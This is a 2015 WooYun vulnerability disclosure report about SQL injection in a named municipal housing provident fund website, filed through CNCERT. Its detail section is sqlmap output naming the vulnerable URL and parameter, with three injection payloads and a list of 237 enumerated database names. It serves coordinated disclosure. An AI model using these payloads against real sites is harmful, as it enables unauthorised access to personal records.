某市住房公积金SQL注入导致1107个数据库泄露

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0130035

漏洞标题：某市住房公积金SQL注入导致1107个数据库泄露

漏洞作者：路人甲

提交时间：2015-07-29 10:09

修复时间：2015-09-14 17:52

公开时间：2015-09-14 17:52

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-07-29：细节已通知厂商并且等待厂商处理中
2015-07-31：厂商已经确认，细节仅向厂商公开
2015-08-10：细节向核心白帽子及相关领域专家公开
2015-08-20：细节向普通白帽子公开
2015-08-30：细节向实习白帽子公开
2015-09-14：细节向公众公开

简要描述：

详细说明：

http://www.tczfgjj.gov.cn/contact.aspx?sortId=30

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sortId (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: sortId=30 AND 8737=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8737=8737) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(113)))
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: sortId=(SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4001=4001) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(113))
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: sortId=30 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(73)+CHAR(109)+CHAR(81)+CHAR(97)+CHAR(88)+CHAR(82)+CHAR(69)+CHAR(88)+CHAR(103)+CHAR(78)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(113),NULL,NULL,NULL-- 
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
current database:    'net5586442'

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sortId (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: sortId=30 AND 8737=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8737=8737) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(113)))
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: sortId=(SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4001=4001) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(113))
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: sortId=30 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(73)+CHAR(109)+CHAR(81)+CHAR(97)+CHAR(88)+CHAR(82)+CHAR(69)+CHAR(88)+CHAR(103)+CHAR(78)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(113),NULL,NULL,NULL-- 
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
available databases [237]:
[*] ludatv
[*] master
[*] model
[*] msdb
[*] net0011828
[*] net0017886
[*] net0024900
[*] net0028073
[*] net0031520
[*] net0034720
[*] net0034800
[*] net00397109
[*] net0075921
[*] net0091670
[*] net0099717
[*] net0108677
[*] net0108703
[*] net0111044
[*] net0123081
[*] net0143388
[*] net0162958
[*] net0178248
[*] net0181025
[*] net0210618
[*] net0221568
[*] net02264391
[*] net0264390
[*] net0267299
[*] net02757737
[*] net0277292
[*] net0277773
[*] net0282199
[*] net0295893
[*] net0298205
[*] net0298908
[*] net0314997
[*] net0333551
[*] net0352821
[*] net0354314
[*] net0356372
[*] net0362455
[*] net03705354
[*] net0383379
[*] net0393394
[*] net0396167
[*] net0396873
[*] net0403516
[*] net0405302
[*] net0416770
[*] net0445192
[*] net0453453
[*] net04602512
[*] net0481206
[*] net0484364
[*] net0489282
[*] net0494267
[*] net0500841
[*] net0501386
[*] net0526098
[*] net0528181
[*] net0531900
[*] net0575267
[*] net0596294
[*] net0606824
[*] net0609984
[*] net0621701
[*] net0639452
[*] net0645795
[*] net0667893
[*] net0668436
[*] net0674752
[*] net0679100
[*] net0707892
[*] net0712933
[*] net0719510
[*] net0721019
[*] net0749312
[*] net0775189
[*] net0779351
[*] net0792963
[*] net0795451
[*] net0821952
[*] net0834205
[*] net0842100
[*] net0850246
[*] net0860502
[*] net0872765
[*] net0885641
[*] net0897907
[*] net0909606
[*] net0921385
[*] net0931481
[*] net0963090
[*] net0974527
[*] net0978607
[*] net0979125
[*] net0984459
[*] net0993810
[*] net1000755
[*] net1018073
[*] net1036508
[*] net1055765
[*] net1084572
[*] net1087379
[*] net1106452
[*] net11325932
[*] net1151328
[*] net1162142
[*] net11649461
[*] net11659193
[*] net1182906
[*] net1190617
[*] net1197122
[*] net12058778
[*] net1211101
[*] net1222556
[*] net1244992
[*] net1247003
[*] net1253220
[*] net1265991
[*] net1283552
[*] net12854775
[*] net1289532
[*] net1317254
[*] net1320099
[*] net1346549
[*] net1365795
[*] net13717326
[*] net1376588
[*] net13796080
[*] net1389902
[*] net1398453
[*] net1400512
[*] net1417775
[*] net1420227
[*] net1437393
[*] net1458900
[*] net1480836
[*] net1486353
[*] net1486595
[*] net1496268
[*] net1497011
[*] net1510061
[*] net1511199
[*] net1519619
[*] net15281463
[*] net15395743
[*] net1544030
[*] net1548844
[*] net1564199
[*] net1590911
[*] net1601502
[*] net1616384
[*] net1622264
[*] net1638655
[*] net1642713
[*] net1643710
[*] net1687578
[*] net1690626
[*] net1693433
[*] net1706247
[*] net1713841
[*] net1715649
[*] net1716624
[*] net1720396
[*] net1727825
[*] net1731040
[*] net1744344
[*] net1754621
[*] net1757049
[*] net1758743
[*] net1760593
[*] net1767007
[*] net1779637
[*] net1830400
[*] net1845366
[*] net1848350
[*] net18567962
[*] net1870967
[*] net1885497
[*] net1905376
[*] net1918257
[*] net1921644
[*] net1941695
[*] net1941969
[*] net1945488
[*] net19479412
[*] net1960418
[*] net1962395
[*] net1968478
[*] net1972177
[*] net1978385
[*] net19785999
[*] net1980783
[*] net2029965
[*] net2041725
[*] net2047585
[*] net2055978
[*] net2059346
[*] net2069587
[*] net2071614
[*] net2103654
[*] net21405726
[*] net2157239
[*] net2167632
[*] net2176987
[*] net2178382
[*] net2189737
[*] net2206763
[*] net2212041
[*] net2224947
[*] net2225855
[*] net2236510
[*] net22481662
[*] net2256322
[*] net2263663
[*] net2270113
[*] net22852210
[*] net2322053
[*] net2322462
[*] net2333907
[*] net2334469
[*] net23347939
[*] net2346126
[*] net23478767
[*] net2354447
[*] net2358813
[*] net2362416
[*] net2363645
[*] net2366854
[*] net2371365
[*] net2379778
[*] net2401699
[*] net2403339
[*] net2404880
[*] net2405780
[*] net2453845

漏洞证明：

修复方案：

参数过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-07-31 17:50

厂商回复：

CNVD确认所述情况，已经转由CNCERT下发给陕西分中心，由其后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0130035

漏洞标题：某市住房公积金SQL注入导致1107个数据库泄露

相关厂商：cncert国家互联网应急中心

漏洞作者：路人甲

提交时间：2015-07-29 10:09

修复时间：2015-09-14 17:52

公开时间：2015-09-14 17:52

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0130035

漏洞标题：某市住房公积金SQL注入导致1107个数据库泄露

相关厂商：cncert国家互联网应急中心

漏洞作者： 路人甲

提交时间：2015-07-29 10:09

修复时间：2015-09-14 17:52

公开时间：2015-09-14 17:52

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0130035"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云